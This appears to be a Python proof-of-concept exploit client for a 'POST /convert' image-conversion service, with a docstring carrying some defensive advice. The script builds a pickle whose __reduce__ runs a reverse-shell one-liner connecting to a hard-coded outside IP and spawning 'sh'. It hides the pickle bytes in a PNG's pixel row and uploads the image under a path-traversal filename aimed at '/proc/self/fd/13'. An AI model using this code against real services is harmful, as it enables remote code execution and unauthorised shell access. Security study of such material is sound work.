"""Proof-of-concept client for an image-conversion endpoint (``POST /convert``).

What is visible in this script:

* a pickle stream whose ``__reduce__`` hook calls ``exec`` is serialised;
* its bytes are stored as pixel values in the last row of a PNG;
* the PNG is uploaded eight times with ``format=BMP`` and a multipart
  filename that contains ``../`` segments and ends in ``/proc/self/fd/13``.

NOTE(review): the server side is not shown. The script presumably relies on
the service (a) using the client-supplied filename when writing the converted
image and (b) unpickling bytes from whatever that path points at. Confirm
against the target application.

Defensive reading:

* never ``pickle.load`` / ``pickle.loads`` data a client can influence;
  loading a pickle can call arbitrary callables, as ``Meow`` below shows;
* treat multipart filenames as untrusted: keep only a sanitised basename,
  resolve the final path and check it stays inside the output directory;
* detection: a web worker opening an outbound TCP connection or spawning
  ``sh`` through a pty is not expected from an image converter.
"""
import pickle

import requests
from PIL import Image

URL = "http://localhost:5000"


class Meow(object):
    """Object whose pickled form runs Python source when it is unpickled."""

    def __reduce__(self):
        # pickle records "call exec(<source>)" instead of object state, so the
        # process that unpickles the stream executes the string below.
        source = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("5.161.227.224",1338));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
        return exec, (source,)


# Canvas size in pixels; only the last row (y == H - 1) is written below.
W, H = 8771, 5903

blob = pickle.dumps(Meow(), protocol=pickle.HIGHEST_PROTOCOL)
canvas = Image.new("RGB", (W, H), (0, 0, 0))

# Pad with NUL bytes to a multiple of three so every pixel gets three bytes.
padded = blob + b"\x00" * ((-len(blob)) % 3)

# Each byte triple is stored reversed: the first byte becomes the blue
# channel and the third the red one.
# NOTE(review): presumably because BMP serialises pixels as B, G, R, so the
# converted file would contain the bytes in their original order.
triples = [
    (padded[k + 2], padded[k + 1], padded[k])
    for k in range(0, len(padded), 3)
]

px = canvas.load()
last_row = H - 1
for col, rgb in enumerate(triples):
    px[col, last_row] = rgb
canvas.save("pickle.png")


def bmp_payload(filename: str):
    """Return the multipart filename that is sent with each upload.

    The result is a relative path made of ``../`` segments that ends in
    *filename*. The middle segment embeds the text after the last ``.`` of
    *filename*, or all of *filename* when it has no dot.

    A server that joins this value onto its output directory without
    normalising it writes outside that directory; use only a sanitised
    basename on the server side.
    """
    return f"../../usr/share/doc/li{filename.rsplit('.', 1)[1] if '.' in filename else filename}fr6/../../../../../..{filename}"


target_path = '/proc/self/fd/13'

# Eight identical parts are posted in one request. The file handles are not
# closed explicitly.
uploads = [
    ("files", (bmp_payload(target_path), open("./pickle.png", "rb"), "image/png"))
    for _ in range(8)
]
response = requests.post(URL + "/convert", files=uploads, data={"format": "BMP"})

print(response.status_code)
print(response.content[:200])